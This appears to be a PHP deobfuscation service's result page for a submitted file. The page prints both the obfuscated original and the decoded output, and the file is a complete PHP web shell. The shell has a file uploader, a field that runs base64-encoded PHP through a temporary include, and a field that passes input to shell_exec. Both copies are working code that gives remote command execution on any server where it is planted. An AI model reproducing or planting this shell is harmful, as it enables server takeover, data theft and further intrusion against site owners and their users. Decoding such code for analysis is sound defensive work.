Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php gotonwcvi;nwcvi:?> <style>body{background-color:#000;color:#fff}</style><formactio..

Decoded Output download

<?php 
gotonwcvi;nwcvi:?> 
<style>body{background-color:#000;color:#fff}</style><formaction=""enctype="multipart/form-data"id="uploader"method="post"name="uploader"><inputname="file"type="file"size="50"><inputname="_upl"id="_upl"type="submit"value="Upload"><br><br><labelfor="">PHPcommand</label><inputname="phpcmd"id=""><inputname="_upl"id="_upl"type="submit"value="runphpcommand"><br><br><labelfor="">Shellcommand</label><inputname="shellcmd"id=""><inputname="_upl"id="_upl"type="submit"value="runshellcommand"></form><?phpgotog8oJX;g8oJX:if($_POST["_upl"]=="Upload"){if(@copy($_FILES["file"]["tmp_name"],$_FILES["file"]["name"])){}}gotoWZRYh;WZRYh:if($_POST["_upl"]=="run php command"){$tmpFile=tempnam(sys_get_temp_dir(),"dynamic");$fileHandle=fopen($tmpFile,"w");$tmp=base64_decode($_POST["phpcmd"]);$vari="<?php ".$tmp." ?>";fwrite($fileHandle,$vari);fclose($fileHandle);ob_start();include$tmpFile;$output=ob_get_clean();unlink($tmpFile);echo$output;}gotouLO8_;uLO8_:if($_POST["_upl"]=="run shell command"){$tmpFile=tempnam(sys_get_temp_dir(),"dynamic");$fileHandle=fopen($tmpFile,"w");$tmp=$_POST["shellcmd"];$vari="<?php echo(@shell_exec("".$tmp.""));?>";fwrite($fileHandle,$vari);fclose($fileHandle);ob_start();include$tmpFile;$output=ob_get_clean();unlink($tmpFile);echo$output;}gotomRb7A;mRb7A:?>

Did this file decode correctly?

Original Code

<?php
gotonwcvi;nwcvi:?>
<style>body{background-color:#000;color:#fff}</style><formaction=""enctype="multipart/form-data"id="uploader"method="post"name="uploader"><inputname="file"type="file"size="50"><inputname="_upl"id="_upl"type="submit"value="Upload"><br><br><labelfor="">PHPcommand</label><inputname="phpcmd"id=""><inputname="_upl"id="_upl"type="submit"value="runphpcommand"><br><br><labelfor="">Shellcommand</label><inputname="shellcmd"id=""><inputname="_upl"id="_upl"type="submit"value="runshellcommand"></form><?phpgotog8oJX;g8oJX:if($_POST["\x5f\x75\x70\x6c"]=="\x55\x70\154\157\x61\x64"){if(@copy($_FILES["\146\x69\x6c\x65"]["\x74\x6d\x70\x5f\156\141\155\145"],$_FILES["\146\x69\154\x65"]["\x6e\x61\x6d\145"])){}}gotoWZRYh;WZRYh:if($_POST["\137\x75\160\x6c"]=="\162\165\x6e\40\x70\150\160\40\x63\157\155\x6d\x61\156\x64"){$tmpFile=tempnam(sys_get_temp_dir(),"\x64\171\156\x61\x6d\151\143");$fileHandle=fopen($tmpFile,"\x77");$tmp=base64_decode($_POST["\160\150\160\143\155\144"]);$vari="\x3c\77\x70\150\x70\x20".$tmp."\40\77\x3e";fwrite($fileHandle,$vari);fclose($fileHandle);ob_start();include$tmpFile;$output=ob_get_clean();unlink($tmpFile);echo$output;}gotouLO8_;uLO8_:if($_POST["\x5f\165\160\x6c"]=="\162\x75\x6e\40\163\150\x65\x6c\x6c\x20\143\x6f\x6d\x6d\141\x6e\144"){$tmpFile=tempnam(sys_get_temp_dir(),"\144\171\156\141\155\151\143");$fileHandle=fopen($tmpFile,"\x77");$tmp=$_POST["\x73\x68\145\154\x6c\x63\x6d\144"];$vari="\74\x3f\x70\150\160\40\145\143\150\157\50\100\x73\x68\145\x6c\154\137\145\170\x65\143\x28\42".$tmp."\42\51\x29\x3b\77\76";fwrite($fileHandle,$vari);fclose($fileHandle);ob_start();include$tmpFile;$output=ob_get_clean();unlink($tmpFile);echo$output;}gotomRb7A;mRb7A:?>

Function Calls

None

Variables

None

Stats

MD5 f270f3fec534f5fb1577f617916d4597
Eval Count 0
Decode Time 34 ms